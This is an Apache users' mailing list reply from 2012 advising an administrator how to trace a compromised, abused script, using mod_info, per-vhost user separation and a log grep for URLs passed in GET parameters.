httpd-users mailing list archives

Site index · List index
Message view « Date » · « Thread »
Top « Date » · « Thread »
From Jaco Kroon <j...@uls.co.za>
Subject Re: [users@httpd] attack on apache
Date Wed, 11 Jan 2012 21:10:50 GMT
On 11/01/12 22:37, Luisa Ester Navarro wrote:
>
>
> ------------------------------------------------------------------------
> J.
> Thanks Jeron:
>              any idea how to start researching which is the leaky script
> Cheers
> Luisa
Hehe, this is where they say, RTFS, or as Jeron suggested, see if you 
can correlate something in the logs.  If apache is still running and you 
happen to have mod_info, it's useful as it at least gives you the paths 
being processed, often the "child script" will hold up the processing 
and you can then spot the script in use in the mod_info data, in other 
cases, it's a wild goose chase.

mpm_user also helps to narrow things down in case of vhost setups (ISP 
... find the offending user - disable the vhost - that usually gets the 
offenders attention, and when you tell him/her that his code is bust 
they need to audit their code they usually end up paying me for my time 
to do it, which usually just involves pointing to one of the lastest 
joomla/wordpress/flavor of the month CMS exploits).

With respect to the logs, often you'll find URIs in the get parameters, 
so perhaps you can try grepping your logs for a regex, something like 
"grep -E "\?.*http://" and see if that shows anything.

I'm afraid there are no real shortcuts.

Good luck.

JK

Mime
View raw message